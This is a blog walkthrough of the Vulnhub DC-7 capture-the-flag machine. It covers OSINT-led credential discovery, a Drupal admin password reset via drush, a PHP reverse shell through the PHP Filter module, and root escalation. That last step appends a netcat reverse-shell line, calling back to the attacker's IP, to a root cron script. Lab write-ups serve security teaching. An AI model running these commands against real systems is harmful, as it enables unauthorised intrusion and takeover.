Vulnhub: DC-7 – CTF

Hello Cyberman!

This article subject CTF (Capture The Flag). This vulnerability machine is name “DC-7”.

And this ctf is level 1. This machine has Debian. And it is a OS.

If you want download please click it.

This machine very different other machines. Because requirement OSINT areas for solutions.
If you say “What is it OSINT?”:
If you’ve heard the name but are wondering what it means, OSINT stands for open source intelligence, which refers to any information that can legally be gathered from free, public sources about an individual or organization. In practice, that tends to mean information found on the internet, but technically any public information falls into the category of OSINT whether it’s books or reports in a public library, articles in a newspaper or statements in a press release.

OSINT also includes information that can be found in different types of media, too. Though we typically think of it as being text-based, information in images, videos, webinars, public speeches and conferences all fall under the term. (Source of “What is OSINT” Definition: If you want more learning for osint please click it.)

If you are ready? Ok, let’s start! Firstly, I installed machine. Then I finded machine ip address.

$ nmap 192.168.1.0/24

I above command I entered to terminal in kali linux. And I find machine. Then I searched with Firefox this ip address.

I came across a website as seen in the picture above.

This website build with Drupal CMS software.
If you say “What is the Drupal?” Drupal a CMS software like WordPress, Joomla etc.

Okay firstly, I scanned this machine with “enum4linux” tools.

I entered to terminal like below:

$ enum4linux 192.168.1.110


But don’t very data. This is sad. Okay, I scanned with nmap tool for details scanning. I runned below like command:

$ nmap 192.168.1.110 -Pn -sA -sV -A

But I couldn’t get enough results.

Okay, I tried brute force attack with Python script in this article. But don’t worked. Because this page protected brute force attack.

I tried scanned with Nikto but bad result. This result like below:

Then I one by one looked at the directory. Don’t worked.

I tried last SQL Injection. But don’t worked. I use below POST method saved a file.

POST /user/login HTTP/1.1
Host: 192.168.1.110
Content-Length: 119
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.110
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.110/user/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

name=DC7USER&pass=pass&form_build_id=form-NQgZMwS2t3GPkCbmpOPJFffBqen9aBDHAyBT5quNiO4&form_id=user_login_form&op=Log+in

And then I used sqlmap. I entered command to below:

$ sqlmap -r post.txt 

And as last I searched in Google. I finded a Twitter account.

This account is like the picture below:

As seen like this profile has the a one Github Account url. I click it.

This account is like the picture below. I clicked it.
This account below like Github account:

This Github account has an repositories. Its name: Staffdb. This repository has the file: config.php. The usually has info like connect, data etc. in config.php file.

I tried connected MySQL with above info. But don’t worked.

As last I tried SSH service. And finally! I’m entered to system terminal.

I used command for entered to terminal:

$ ssh dc7user@192.168.1.110

I entered password for: MdR3xOgB7#dW

Now, I came in enter.

I firstly, enter “ls” command in terminal. As result, I seen a file its name “mbox”. Then I entered “cat mbox” in terminal for read mbox file. I taked it result like below.

I paid attention to the subject. There is a command like: “Subject: Cron /opt/scripts/backups.sh”. Ok, this time I read the “backup.sh” file.

$ cat /opt/scripts/backups.sh

As result like below

There is a wonderful clue. Clue is name “drush”.
This system use drush (Drupal Shell) terminal. What is drush terminal?
Drush, aka The Drupal Shell, is a command line utility and UNIX scripting interface for Drupal. It allows access to common Drupal features and tasks via the command line. It can help speed up common tasks for Drupal site builders, developers, and DevOps teams. Among other things, it makes it easier to integrate Drupal into CI/CD workflows. (For source and more click it.)

Okay, so I used admin password change with drush. I went to with “cd” in terminal for “/var/www/html” then I entered below command:

$ drush user-password admin --password="s4m"

Yeah, now I changed admin user password. I entered login page.
User: admin
Password: s4m

Now, I entered with admin user in Drupal Admin Panel.

Okay, I need a reverse shell. The Drupal run with PHP. I mean, I need a PHP script for reverse shell.
I php code searched in Google. And this code address: Github PHP Reverse Shell.

I more searched for Drupal in Google. And I finded a extensions. Its name PHP Filter.
The description of this plugin is as follows:
Allows embedded PHP code/snippets to be evaluated. Enabling this can cause security and performance issues as it allows users to execute PHP code on your site.
Machine name: php
Version: 8.x-1.0
Requires: FilterUserSystem

I can run PHP code on the page with this extension.

I installed like above picture. Install from a URL: https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

I installed seen like above picture. Now, I create new content with reverse shell code.

I edited PHP Reverse Shell Code.
My kali linux machine Ip address: 192.168.1.138
And I use port number: 9001

Then I listen connection with netcat tool for I enter to terminal this command:

$ nc -lvp 9001

Then I go add content page and first I do text format “PHP Code” then click it “Preview”.
As seen below like picture:

Finally! I connection terminale with www-data user. If you say “What is www-data user?”. In summary: www-data is the user that web servers on Ubuntu (Apache, nginx, for example) use by default for normal operation. The web server process can access any file that www-data can access.

The came connection result like below picture.

Now, I need use backup.sh for be root. Because user www-data has authority. To run extra commands in “backup.sh” file. First I need bash. For this I enter to this command in terminal:

$ python -c 'import pty;pty.spawn("/bin/bash")'

As seen like below picture:

Okay, now I need msfvenom tools. (If you don’t know msfvenom: Please review this article click it.) Because I opened new reverse shell then I enter to below command in Kali Linux terminal:

$ msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.138 lport=9003 R

Yep! Now ready new terminal payload. The part drawn in white is our new payload. Now, I open new listener terminal in kali linux and enter to this command:

$ nc -lvp 9003

And I going to first listener terminal (port number 9001). First, I go “/opt/scripts” then I enter below command:

$ echo "mkfifo /tmp/knfqht; nc 192.168.1.138 9003 0/tmp/knfqht 2>&1; rm /tmp/knfqht" >>backups.sh

If you don’t know “echo” and “>>” command please review this article: “What is the echo?“,”What is the ‘>>’

As seen like above picture, I used “./” command for “backups.sh” file. And finally!

I did be root.

I captured to flag.

Have a nice day with lots of informatics. 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *